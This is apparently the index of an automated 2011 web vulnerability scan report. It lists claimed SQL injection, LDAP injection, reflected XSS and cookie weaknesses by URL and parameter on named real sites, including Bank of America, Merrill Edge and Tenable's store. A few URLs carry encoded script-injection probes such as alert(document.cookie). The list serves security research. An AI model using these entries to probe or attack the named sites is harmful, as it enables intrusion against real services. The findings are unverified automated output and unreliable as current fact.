Reflected XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-89, CWE-113, DORK Search, Vulnerable Websites

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 26 09:34:48 CDT 2011.
XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]

1.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [name of an arbitrarily supplied request parameter]

1.3. http://afreshbunch.com/ [ASPSESSIONIDSSTDDTRS cookie]

1.4. http://afreshbunch.com/files/com/call.asp [site_id parameter]

1.5. http://afreshbunch.com/user/453756/theme/design/AFB2011/style.css [REST URL parameter 3]

1.6. https://store.tenable.com/ [cPath parameter]

1.7. https://store.tenable.com/ [main_page parameter]

1.8. https://store.tenable.com/ [name of an arbitrarily supplied request parameter]

1.9. https://store.tenable.com/includes/templates/tenable/css/t.css [REST URL parameter 1]

1.10. https://store.tenable.com/includes/templates/tenable/css/t.css [name of an arbitrarily supplied request parameter]

1.11. https://store.tenable.com/includes/templates/tenable/css/t.css [v parameter]

1.12. https://store.tenable.com/includes/templates/tenable/img/favicon.ico [REST URL parameter 1]

1.13. https://store.tenable.com/includes/templates/tenable/jscript/t.js [REST URL parameter 1]

1.14. https://store.tenable.com/includes/templates/tenable/jscript/t.js [name of an arbitrarily supplied request parameter]

1.15. https://store.tenable.com/includes/templates/tenable/jscript/t.js [v parameter]

1.16. https://store.tenable.com/index.php [REST URL parameter 1]

1.17. https://store.tenable.com/index.php [action parameter]

1.18. https://store.tenable.com/index.php [cPath parameter]

1.19. https://store.tenable.com/index.php [cart_quantity parameter]

1.20. https://store.tenable.com/index.php [main_page parameter]

1.21. https://store.tenable.com/index.php [name of an arbitrarily supplied request parameter]

1.22. https://store.tenable.com/index.php [products_id parameter]

1.23. https://store.tenable.com/index.php [zenid parameter]

1.24. http://www.afreshbunch.com/ [email parameter]

1.25. https://www.bankofamerica.com/Control.do [BOA_0020 cookie]

1.26. https://www.bankofamerica.com/Control.do [BOA_COM_BT_ELIGIBLE cookie]

1.27. https://www.bankofamerica.com/Control.do [CONTEXT cookie]

1.28. https://www.bankofamerica.com/Control.do [INTL_LANG cookie]

1.29. https://www.bankofamerica.com/Control.do [TLTSID cookie]

1.30. https://www.bankofamerica.com/Control.do [name of an arbitrarily supplied request parameter]

1.31. https://www.bankofamerica.com/ProcessUser.do [TLTSID cookie]

1.32. http://www.clone-systems.com/ecommerce/cart.php [CMSSESSIDe4d04fcf cookie]

1.33. http://www.clone-systems.com/ecommerce/cart.php [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]

2.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [num parameter]

2.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [TCID cookie]

2.4. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [ngen_throttle cookie]

2.5. http://sofa.bankofamerica.com/cm [cck parameter]

2.6. http://sofa.bankofamerica.com/cm [ci parameter]

2.7. http://sofa.bankofamerica.com/eluminate [ci parameter]

2.8. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]

2.9. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]

3. HTTP header injection

4. Cross-site scripting (reflected)

4.1. https://account.snap.com/signup.php [email parameter]

4.2. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.3. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.4. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.5. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.6. https://account.snap.com/signup.php [url parameter]

4.7. http://ads.adxpose.com/ads/ads.js [uid parameter]

4.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

4.9. http://adserving.cpxinteractive.com/st [section parameter]

4.10. http://afreshbunch.com/files/com/call.asp [instance_id parameter]

4.11. http://afreshbunch.com/files/com/call.asp [lastpage parameter]

4.12. http://afreshbunch.com/forums/ [name of an arbitrarily supplied request parameter]

4.13. http://afreshbunch.com/forums/ [page parameter]

4.14. http://ar.voicefive.com/b/rc.pli [func parameter]

4.15. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.17. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json [callback parameter]

4.18. http://event.adxpose.com/event.flow [uid parameter]

4.19. http://ib.adnxs.com/ab [cnd parameter]

4.20. http://ib.adnxs.com/ptj [redir parameter]

4.21. http://login.sisna.com/login_multiple/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter]

4.22. http://login.sisna.com/login_multiple/ [RelayState parameter]

4.23. http://login.sisna.com/login_multiple/ [SAMLRequest parameter]

4.24. http://login.sisna.com/login_multiple/ [name of an arbitrarily supplied request parameter]

4.25. http://shots.snap.com/rk.php [vid parameter]

4.26. http://shots.snap.com/shot/ [size parameter]

4.27. http://shots.snap.com/shot/ [svc parameter]

4.28. http://shots.snap.com/shot/ [url parameter]

4.29. http://shots.snap.com/shot/ [url parameter]

4.30. http://shots.snap.com/snap_shots.js [key parameter]

4.31. http://shots.snap.com/snap_shots.js [preview_trigger parameter]

4.32. http://spamlaws.us.intellitxt.com/al.asp [jscallback parameter]

4.33. http://spamlaws.us.intellitxt.com/iframescript.jsp [src parameter]

4.34. http://spamlaws.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.35. http://spamlaws.us.intellitxt.com/v4/init [jscallback parameter]

4.36. http://spamlaws.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.37. http://widgets.digg.com/buttons/count [url parameter]

4.38. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]

4.39. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]

4.40. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 2]

4.41. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 3]

4.42. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 4]

4.43. http://www.afreshbunch.com/ [email parameter]

4.44. http://www.afreshbunch.com/files/com/call.asp [instance_id parameter]

4.45. http://www.afreshbunch.com/files/com/call.asp [lastpage parameter]

4.46. http://www.directbrand.com/tracking202/static/landing.php [lpip parameter]

4.47. http://www.directbrand.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

4.48. http://www.genbook.com/bookings/booknowjstag.action [bookingSourceId parameter]

4.49. http://www.merrilledge.com/M/WebResource.axd [d parameter]

4.50. http://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]

4.51. https://www.merrilledge.com/M/WebResource.axd [d parameter]

4.52. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

4.53. http://www.secureconnect.com/rssReplayProxy.php [name of an arbitrarily supplied request parameter]

4.54. http://www.secureconnect.com/rssReplayProxy.php [source parameter]

4.55. http://adserving.cpxinteractive.com/st [Referer HTTP header]

4.56. http://player.vimeo.com/config/14606948 [Referer HTTP header]

4.57. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.58. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.59. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.60. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

4.61. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

4.62. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

4.63. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.64. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]

4.65. https://www.bankofamerica.com/privacy [state cookie]

4.66. https://www.bankofamerica.com/privacy/Control.do [state cookie]

4.67. https://www.bankofamerica.com/privacy/index.jsp [state cookie]

4.68. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

4.69. https://www.bankofamerica.com/smallbusiness/index.jsp [state cookie]

4.70. https://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://109.xg4ken.com/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://afreshbunch.com/crossdomain.xml

5.4. http://bridgefront.com/crossdomain.xml

5.5. http://data.cmcore.com/crossdomain.xml

5.6. http://data.coremetrics.com/crossdomain.xml

5.7. http://firstdata.122.2o7.net/crossdomain.xml

5.8. http://fls.doubleclick.net/crossdomain.xml

5.9. http://now.eloqua.com/crossdomain.xml

5.10. http://pixel.quantserve.com/crossdomain.xml

5.11. http://servedby.flashtalking.com/crossdomain.xml

5.12. https://shots-s.snap.com/crossdomain.xml

5.13. http://shots.snap.com/crossdomain.xml

5.14. http://sofa.bankofamerica.com/crossdomain.xml

5.15. http://tc.bankofamerica.com/crossdomain.xml

5.16. https://tc.bankofamerica.com/crossdomain.xml

5.17. http://www.afreshbunch.com/crossdomain.xml

5.18. http://realestatecenter.bankofamerica.com/crossdomain.xml

5.19. https://secure.opinionlab.com/crossdomain.xml

5.20. http://stats.wordpress.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://firstdata.122.2o7.net/clientaccesspolicy.xml

6.3. http://stats.wordpress.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://afreshbunch.com/

7.2. http://afreshbunch.com/forums/

7.3. http://learn.bridgefront.com/

7.4. http://learn.bridgefront.com/login.jsp

7.5. http://login.sisna.com/login_multiple/

7.6. http://www.afreshbunch.com/

8. SQL statement in request parameter

8.1. https://account.snap.com/signup.php

8.2. http://learn.bridgefront.com/KeyRegister

8.3. https://www.fs.ustrust.com/login/login.aspx

9. SSL cookie without secure flag set

9.1. https://account.snap.com/signup.php

9.2. https://landingpage.leads.dynamicssite.com/PostLead.aspx

9.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

9.4. https://secure.opinionlab.com/

9.5. https://secure.opinionlab.com/ccc01/comment_card_d.asp

9.6. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

9.7. https://support.sentrigo.com/

9.8. https://www.bankofamerica.com/

9.9. https://www.bankofamerica.com/homepage/WidgetAction.go

9.10. https://www.bankofamerica.com/homepage/overview.go

9.11. https://www.bankofamerica.com/homepage/stateSelect.go

9.12. https://www.mysecureconnect.com/login.aspx

9.13. https://lct.salesforce.com/sfga.js

9.14. https://olui2.fs.ml.com/login/login.aspx

9.15. https://securitymetrics.com/sm/PANscan/

9.16. https://securitymetrics.com/sm/determinesaq/

9.17. https://securitymetrics.com/sm/determinesaq/reset

9.18. https://securitymetrics.com/sm/determinesaq/storechd

9.19. https://securitymetrics.com/sm/determinesaq/terminaltype

9.20. https://shots-s.snap.com/snap_shots.js

9.21. https://store.tenable.com/index.php

9.22. https://support.tenable.com/support-center/

9.23. https://tc.bankofamerica.com/c

9.24. https://www.bankofamerica.com/Control.do

9.25. https://www.bankofamerica.com/ProcessUser.do

9.26. https://www.bankofamerica.com/deposits/cds-iras.go

9.27. https://www.bankofamerica.com/deposits/checking-accounts.go

9.28. https://www.bankofamerica.com/deposits/savings-accounts.go

9.29. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

9.30. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

9.31. https://www.bankofamerica.com/military

9.32. https://www.bankofamerica.com/privacy

9.33. https://www.bankofamerica.com/privacy/Control.do

9.34. https://www.bankofamerica.com/privacy/index.jsp

9.35. https://www.bankofamerica.com/search/Search.do

9.36. https://www.bankofamerica.com/smallbusiness/index.jsp

9.37. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

9.38. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

9.39. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

9.40. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

9.41. https://www.bankofamerica.com/www/global/js/tc_logging.js

9.42. https://www.fs.ustrust.com/login/login.aspx

9.43. https://www.merrilledge.com/m/pages/home.aspx

10. Session token in URL

10.1. http://l.sharethis.com/pview

10.2. https://www.bankofamerica.com/credit-cards/cardoverview.action

10.3. http://www.facebook.com/extern/login_status.php

10.4. http://www.hugthecloud.com/

11. SSL certificate

11.1. https://landingpage.leads.dynamicssite.com/

11.2. https://m8security.foxycart.com/

11.3. https://secure.opinionlab.com/

11.4. https://securitymetrics.com/

11.5. https://store.tenable.com/

11.6. https://support.tenable.com/

11.7. https://www.clone-systems.com/

11.8. https://www.comodo.com/

11.9. https://www.hackerguardian.com/

11.10. https://account.snap.com/

11.11. https://lct.salesforce.com/

11.12. https://militarybankonline.bankofamerica.com/

11.13. https://olui2.fs.ml.com/

11.14. https://secure.comodo.com/

11.15. https://secure.comodo.net/

11.16. https://secure.eloqua.com/

11.17. https://shots-s.snap.com/

11.18. https://support.sentrigo.com/

11.19. https://tc.bankofamerica.com/

11.20. https://www.bankofamerica.com/

11.21. https://www.fs.ustrust.com/

11.22. https://www.mavitunasecurity.com/

11.23. https://www.merrilledge.com/

11.24. https://www.mysecureconnect.com/

11.25. https://www.saintcorporation.com/

12. ASP.NET ViewState without MAC enabled

12.1. http://www.merrilledge.com/m/pages/global-oao.aspx

12.2. https://www.merrilledge.com/m/pages/global-oao.aspx

12.3. https://www.merrilledge.com/m/pages/home.aspx

13. Open redirection

14. Cookie scoped to parent domain

14.1. http://assets.trialpay.com/tr/

14.2. http://shots.snap.com/rk.php

14.3. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

14.4. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

14.5. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

14.6. http://www.clone-systems.com/ecommerce/index.php

14.7. http://www.hugthecloud.com/

14.8. http://www.hugthecloud.com/favicon.ico

14.9. http://www.m8security.com/

14.10. http://109.xg4ken.com/media/redir.php

14.11. http://ad.amgdgt.com/ads/

14.12. http://ar.voicefive.com/b/wc_beacon.pli

14.13. http://ar.voicefive.com/bmx3/broker.pli

14.14. http://b.scorecardresearch.com/b

14.15. http://b.scorecardresearch.com/p

14.16. http://b.voicefive.com/b

14.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.18. http://c.bing.com/c.gif

14.19. http://cf.addthis.com/red/p.json

14.20. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

14.21. http://cspix.media6degrees.com/orbserv/hbpix

14.22. http://downloads.yahoo.com/

14.23. http://downloads.yahoo.com/freeware

14.24. http://downloads.yahoo.com/linux

14.25. http://downloads.yahoo.com/mobile

14.26. http://downloads.yahoo.com/windows

14.27. http://downloads.yahoo.com/windows/desktop-enhancements/virtual-desktop

14.28. http://downloads.yahoo.com/windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305

14.29. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json

14.30. http://ib.adnxs.com/ab

14.31. http://ib.adnxs.com/ptj

14.32. http://ib.adnxs.com/pxj

14.33. http://ib.adnxs.com/seg

14.34. http://maps.google.com/maps

14.35. http://maps.google.com/maps/vp

14.36. http://mydownload.paretologic.safecart.com/pcha/homepage

14.37. https://olui2.fs.ml.com/login/login.aspx

14.38. http://pixel.33across.com/ps/

14.39. http://pixel.intellitxt.com/pixel.jsp

14.40. http://pixel.quantserve.com/pixel

14.41. http://segment-pixel.invitemedia.com/pixel

14.42. http://servedby.flashtalking.com/click/16008

14.43. https://shots-s.snap.com/snap_shots.js

14.44. http://shots.snap.com/images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/

14.45. http://shots.snap.com/preview/

14.46. http://shots.snap.com/shot/

14.47. http://shots.snap.com/snap_shots.js

14.48. http://spamlaws.us.intellitxt.com/al.asp

14.49. http://spamlaws.us.intellitxt.com/intellitxt/front.asp

14.50. http://tc.bankofamerica.com/i

14.51. https://tc.bankofamerica.com/c

14.52. http://threats2.paretologic.safecart.com/pcha/download

14.53. http://translate.google.com/translate_a/element.js

14.54. http://www.afreshbunch.com/

14.55. https://www.bankofamerica.com/

14.56. https://www.bankofamerica.com/credit-cards/cardoverview.action

14.57. https://www.bankofamerica.com/homepage/overview.go

14.58. https://www.bankofamerica.com/homepage/stateSelect.go

14.59. https://www.bankofamerica.com/military

14.60. https://www.bankofamerica.com/military/index.cfm

14.61. https://www.bankofamerica.com/privacy

14.62. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

14.63. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

14.64. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

14.65. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

14.66. https://www.bankofamerica.com/www/global/js/tc_logging.js

14.67. http://www.bing.com/

14.68. http://www.bing.com/HPImageArchive.aspx

14.69. http://www.bing.com/fd/ls/l

14.70. http://www.bing.com/scopePopupHandler.aspx

14.71. http://www.bizographics.com/collect/

14.72. http://www.bridgefront.com/cart/

14.73. https://www.fs.ustrust.com/login/login.aspx

14.74. http://www.is3.com/about/contactUs.do

14.75. https://www.merrilledge.com/m/pages/home.aspx

14.76. http://www.paretologic.com/download/pchealthadvisor/revenuewire/

15. Cookie without HttpOnly flag set

15.1. https://account.snap.com/signup.php

15.2. http://ads.adxpose.com/ads/ads.js

15.3. http://afreshbunch.com/about.htm

15.4. http://assets.trialpay.com/tr/

15.5. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

15.6. http://event.adxpose.com/event.flow

15.7. http://ikano.com/

15.8. http://learn.bankofamerica.com/

15.9. http://learn.bridgefront.com/

15.10. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

15.11. https://secure.opinionlab.com/

15.12. https://secure.opinionlab.com/ccc01/comment_card_d.asp

15.13. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

15.14. http://shots.snap.com/rk.php

15.15. http://sofa.bankofamerica.com/eluminate

15.16. https://support.sentrigo.com/

15.17. http://t2.trackalyzer.com/trackalyze.asp

15.18. http://t2.trackalyzer.com/trackalyze.asp

15.19. http://www.afreshbunch.com/

15.20. http://www.backbonesecurity.com/interior.cfm

15.21. http://www.bankofamerica.com/weblinking/

15.22. https://www.bankofamerica.com/

15.23. https://www.bankofamerica.com/Control.do

15.24. https://www.bankofamerica.com/ProcessUser.do

15.25. https://www.bankofamerica.com/credit-cards/cardoverview.action

15.26. https://www.bankofamerica.com/deposits/cds-iras.go

15.27. https://www.bankofamerica.com/deposits/checking-accounts.go

15.28. https://www.bankofamerica.com/deposits/index.action

15.29. https://www.bankofamerica.com/deposits/savings-accounts.go

15.30. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

15.31. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

15.32. https://www.bankofamerica.com/homepage/WidgetAction.go

15.33. https://www.bankofamerica.com/homepage/overview.go

15.34. https://www.bankofamerica.com/homepage/stateSelect.go

15.35. https://www.bankofamerica.com/hub/index.action

15.36. https://www.bankofamerica.com/planning/investments.action

15.37. https://www.bankofamerica.com/privacy/Control.do

15.38. https://www.bankofamerica.com/privacy/index.jsp

15.39. https://www.bankofamerica.com/search/Search.do

15.40. https://www.bankofamerica.com/sitemap/index.action

15.41. https://www.bankofamerica.com/smallbusiness/index.jsp

15.42. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

15.43. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

15.44. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

15.45. http://www.clone-systems.com/ecommerce/index.php

15.46. http://www.clone-systems.com/pci-scanning.html

15.47. http://www.clone-systems.com/stylesheet.php

15.48. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php

15.49. http://www.firstdata.com/en_us/home

15.50. http://www.genbook.com/bookings/booknowjstag.action

15.51. http://www.genbook.com/bookings/serviceprovider/30010843/logo

15.52. http://www.genbook.com/bookings/serviceprovider/30010944/logo

15.53. http://www.hugthecloud.com/

15.54. http://www.hugthecloud.com/favicon.ico

15.55. http://www.m8security.com/

15.56. http://www.net-address.co.uk/

15.57. http://109.xg4ken.com/media/redir.php

15.58. http://ad.amgdgt.com/ads/

15.59. http://ad.yieldmanager.com/pixel

15.60. http://ar.voicefive.com/b/wc_beacon.pli

15.61. http://ar.voicefive.com/bmx3/broker.pli

15.62. http://b.scorecardresearch.com/b

15.63. http://b.scorecardresearch.com/p

15.64. http://b.voicefive.com/b

15.65. http://bing.com/

15.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.67. http://c.bing.com/c.gif

15.68. http://cf.addthis.com/red/p.json

15.69. http://cspix.media6degrees.com/orbserv/hbpix

15.70. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json

15.71. http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951

15.72. http://freemarker.com/

15.73. https://lct.salesforce.com/sfga.js

15.74. http://maps.google.com/maps

15.75. http://maps.google.com/maps/vp

15.76. http://mydownload.paretologic.safecart.com/pcha/homepage

15.77. http://nuclearpesticide.com/

15.78. https://olui2.fs.ml.com/login/login.aspx

15.79. http://partners.genbook.com/MAPProc.aspx

15.80. http://pixel.33across.com/ps/

15.81. http://pixel.intellitxt.com/pixel.jsp

15.82. http://pixel.quantserve.com/pixel

15.83. https://securitymetrics.com/sm/PANscan/

15.84. https://securitymetrics.com/sm/determinesaq/

15.85. https://securitymetrics.com/sm/determinesaq/reset

15.86. https://securitymetrics.com/sm/determinesaq/storechd

15.87. https://securitymetrics.com/sm/determinesaq/terminaltype

15.88. http://segment-pixel.invitemedia.com/pixel

15.89. http://servedby.flashtalking.com/click/16008

15.90. https://shots-s.snap.com/snap_shots.js

15.91. http://shots.snap.com/images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/

15.92. http://shots.snap.com/preview/

15.93. http://shots.snap.com/shot/

15.94. http://shots.snap.com/snap_shots.js

15.95. http://sofa.bankofamerica.com/cm

15.96. http://sofa.bankofamerica.com/eluminate

15.97. http://spamlaws.us.intellitxt.com/al.asp

15.98. http://spamlaws.us.intellitxt.com/intellitxt/front.asp

15.99. https://store.tenable.com/index.php

15.100. https://support.tenable.com/support-center/

15.101. http://tc.bankofamerica.com/i

15.102. https://tc.bankofamerica.com/c

15.103. http://threats2.paretologic.safecart.com/pcha/download

15.104. http://tracking.hearthstoneonline.com/www/delivery/ajs.php

15.105. http://tracking.hearthstoneonline.com/www/delivery/lg.php

15.106. http://translate.google.com/translate_a/element.js

15.107. http://twitter.com/javascripts/blogger.js

15.108. http://twitter.com/statuses/user_timeline/hugthecloud.json

15.109. http://www.afreshbunch.com/

15.110. http://www.afreshbunch.com/files/com/call.asp

15.111. http://www.bankofamerica.com/adtrack/index.cgi

15.112. http://www.bankofamerica.com/community/flyout/HM_Arrays.js

15.113. http://www.bankofamerica.com/community/stylesheets/community_ov_styles.css

15.114. http://www.bankofamerica.com/foundation/flyout/HM_Arrays.js

15.115. http://www.bankofamerica.com/global/hs_home/common.css

15.116. http://www.bankofamerica.com/global/hs_home/stylesheets/home_win_ie6.css

15.117. http://www.bankofamerica.com/global/images/new_Banklogo.gif

15.118. http://www.bankofamerica.com/global/js/bridge-js-utils.js

15.119. http://www.bankofamerica.com/global/js/masthead.js

15.120. http://www.bankofamerica.com/global/js/mvc-js-utils.js

15.121. http://www.bankofamerica.com/global/mvc_objects/flyout/BofA_keyboard_navigation.js

15.122. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_BankAmerica.js

15.123. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_Loader.js

15.124. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_ScriptDOM.js

15.125. http://www.bankofamerica.com/global/mvc_objects/images/1pixel_clear.gif

15.126. http://www.bankofamerica.com/global/mvc_objects/images/mhd_5x1_lines2.gif

15.127. http://www.bankofamerica.com/global/mvc_objects/images/mhd_reg_5x1_lines.gif

15.128. http://www.bankofamerica.com/global/mvc_objects/images/pop_bac_logo.gif

15.129. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style.css

15.130. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css

15.131. http://www.bankofamerica.com/global/mvc_objects/stylesheet/masthead.css

15.132. http://www.bankofamerica.com/global/stylesheets/01_win_ie.css

15.133. http://www.bankofamerica.com/images/px.gif

15.134. http://www.bankofamerica.com/images/shared/dot_clear.gif

15.135. http://www.bankofamerica.com/small_business/business_financing/stylesheets/masthead.css

15.136. http://www.bankofamerica.com/small_business/online_banking_and_services/stylesheets/masthead.css

15.137. http://www.bankofamerica.com/weblinking/main.css

15.138. http://www.bankofamerica.com/weblinking/main_ie.css

15.139. http://www.bankofamerica.com/www/global/js/tc_throttle.js

15.140. http://www.bankofamerica.com/x.gif

15.141. https://www.bankofamerica.com/military

15.142. https://www.bankofamerica.com/military/index.cfm

15.143. https://www.bankofamerica.com/privacy

15.144. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

15.145. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

15.146. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

15.147. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

15.148. https://www.bankofamerica.com/www/global/js/tc_logging.js

15.149. http://www.bing.com/

15.150. http://www.bing.com/HPImageArchive.aspx

15.151. http://www.bing.com/fd/ls/l

15.152. http://www.bing.com/scopePopupHandler.aspx

15.153. http://www.bizographics.com/collect/

15.154. http://www.bridgefront.com/cart/

15.155. http://www.directbrand.com/tracking202/redirect/pci.php

15.156. http://www.directbrand.com/tracking202/static/record.php

15.157. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11

15.158. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11

15.159. https://www.fs.ustrust.com/login/login.aspx

15.160. http://www.googleadservices.com/pagead/aclk

15.161. http://www.is3.com/about/contactUs.do

15.162. https://www.merrilledge.com/m/pages/home.aspx

15.163. http://www.nuclearpesticide.com/

15.164. http://www.paretologic.com/download/pchealthadvisor/revenuewire/

16. Password field with autocomplete enabled

16.1. https://account.snap.com/signup.php

16.2. http://afreshbunch.com/

16.3. http://afreshbunch.com/forums/

16.4. https://edit.yahoo.com/registration

16.5. http://learn.bridgefront.com/

16.6. http://learn.bridgefront.com/login.jsp

16.7. http://login.sisna.com/login_multiple/

16.8. http://login.sisna.com/login_multiple/

16.9. https://login.yahoo.com/config/login

16.10. https://securitymetrics.com/

16.11. https://securitymetrics.com/login.adp

16.12. https://securitymetrics.com/login.adp

16.13. https://securitymetrics.com/register_home.adp

16.14. https://store.tenable.com/index.php

16.15. https://store.tenable.com/index.php

16.16. https://support.sentrigo.com/User/Login

16.17. https://support.tenable.com/support-center/

16.18. http://www.afreshbunch.com/

16.19. http://www.afreshbunch.com/

16.20. http://www.bridgefront.com/cart/

16.21. http://www.bridgefront.com/cart/

16.22. https://www.clone-systems.com/ecommerce/checkout.php

16.23. https://www.clone-systems.com/ecommerce/checkout.php

16.24. https://www.comodo.com/login/comodo-members.php

16.25. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11

16.26. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11

16.27. http://www.firstdata.com/en_us/home

16.28. https://www.mysecureconnect.com/login.aspx

16.29. https://www.net-address.co.uk/manager.asp

16.30. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

17. Source code disclosure

18. Referer-dependent response

18.1. http://adserving.cpxinteractive.com/st

18.2. http://response.firstdata.com/

18.3. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

18.4. http://twitter.com/statuses/user_timeline/hugthecloud.json

18.5. http://www.bizographics.com/collect/

18.6. http://www.facebook.com/plugins/like.php

19. Cross-domain POST

19.1. http://afreshbunch.com/

19.2. http://www.afreshbunch.com/

19.3. http://www.cleanallspyware.com/

19.4. http://www.hipaarx.net/

19.5. http://www.onestoppciscan.com/contact.html

20. Cross-domain Referer leakage

20.1. http://ad.amgdgt.com/ads/

20.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

20.3. http://afreshbunch.com/

20.4. http://afreshbunch.com/forums/

20.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

20.6. https://edit.yahoo.com/registration

20.7. http://fls.doubleclick.net/activityi

20.8. http://freemarker.com/landing.php

20.9. http://freemarker.com/top.php

20.10. http://googleads.g.doubleclick.net/pagead/ads

20.11. http://googleads.g.doubleclick.net/pagead/ads

20.12. http://googleads.g.doubleclick.net/pagead/ads

20.13. http://googleads.g.doubleclick.net/pagead/ads

